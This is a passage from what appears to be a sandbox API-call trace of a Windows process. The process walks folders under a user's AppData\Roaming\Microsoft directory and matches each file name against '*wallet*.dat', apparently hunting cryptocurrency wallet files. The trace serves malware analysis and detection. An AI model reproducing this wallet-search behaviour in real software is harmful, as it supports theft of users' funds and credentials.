lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e88 [0207.460] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.460] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0207.460] wsprintfA (in: param_1=0x19b6a0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 82 [0207.460] wsprintfA (in: param_1=0x19b7a8, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 44 [0207.460] PathMatchSpecA (pszFile="_hiddenPbk", pszSpec="*wallet*.dat") returned 0 [0207.460] wsprintfA (in: param_1=0x19b370, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned 84 [0207.460] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.460] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.460] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0207.461] wsprintfA (in: param_1=0x19b018, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0207.461] wsprintfA (in: param_1=0x19b120, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 57 [0207.461] PathMatchSpecA (pszFile="rasphone.pbk", pszSpec="*wallet*.dat") returned 0 [0207.461] wsprintfA (in: param_1=0x19ace8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*") returned 97 [0207.461] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="r", cAlternateFileName="J")) returned 0xffffffff [0207.461] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0207.461] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.461] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0207.461] FindClose (in: hFindFile=0x5e7e88 | out: hFindFile=0x5e7e88) returned 1 [0207.461] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 0 [0207.461] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.461] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0207.462] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.462] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Office", cAlternateFileName="")) returned 1 [0207.462] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office") returned 54 [0207.462] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Office") returned 16 [0207.462] PathMatchSpecA (pszFile="Office", pszSpec="*wallet*.dat") returned 0 [0207.462] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*") returned 56 [0207.462] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7848 [0207.463] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.463] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0207.463] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0207.463] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\MSO1033.acl") returned 28 [0207.463] PathMatchSpecA (pszFile="MSO1033.acl", pszSpec="*wallet*.dat") returned 0 [0207.463] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*") returned 68 [0207.464] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="M", cAlternateFileName="")) returned 0xffffffff [0207.464] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Recent", cAlternateFileName="")) returned 1 [0207.464] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 61 [0207.464] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent") returned 23 [0207.464] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0207.464] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned 63 [0207.464] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.464] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.464] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xa481d59b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa481d59b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="index.dat", cAlternateFileName="")) returned 1 [0207.465] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0207.465] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\index.dat") returned 33 [0207.465] PathMatchSpecA (pszFile="index.dat", pszSpec="*wallet*.dat") returned 0 [0207.465] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*") returned 73 [0207.465] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xa481d59b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa481d59b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="i", cAlternateFileName="J")) returned 0xffffffff [0207.465] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0207.465] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0207.465] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\Templates.LNK") returned 37 [0207.465] PathMatchSpecA (pszFile="Templates.LNK", pszSpec="*wallet*.dat") returned 0 [0207.465] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*") returned 77 [0207.465] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.465] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0207.465] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.465] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Recent", cAlternateFileName="")) returned 0 [0207.466] FindClose (in: hFindFile=0x5e7848 | out: hFindFile=0x5e7848) returned 1 [0207.466] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Outlook", cAlternateFileName="")) returned 1 [0207.466] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook") returned 55 [0207.466] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook") returned 17 [0207.466] PathMatchSpecA (pszFile="Outlook", pszSpec="*wallet*.dat") returned 0 [0207.466] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned 57 [0207.466] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7b88 [0207.467] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.467] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0207.467] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0207.467] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.srs") returned 29 [0207.467] PathMatchSpecA (pszFile="Outlook.srs", pszSpec="*wallet*.dat") returned 0 [0207.467] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*") returned 69 [0207.467] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="O", cAlternateFileName="TEMPÐ\x07\x02")) returned 0xffffffff [0207.468] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0207.468] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0207.468] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.xml") returned 29 [0207.468] PathMatchSpecA (pszFile="Outlook.xml", pszSpec="*wallet*.dat") returned 0 [0207.468] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*") returned 69 [0207.468] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="O", cAlternateFileName="TEMPÐ\x07\x02")) returned 0xffffffff [0207.468] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0207.468] FindClose (in: hFindFile=0x5e7b88 | out: hFindFile=0x5e7b88) returned 1 [0207.468] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Protect", cAlternateFileName="")) returned 1 [0207.468] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" 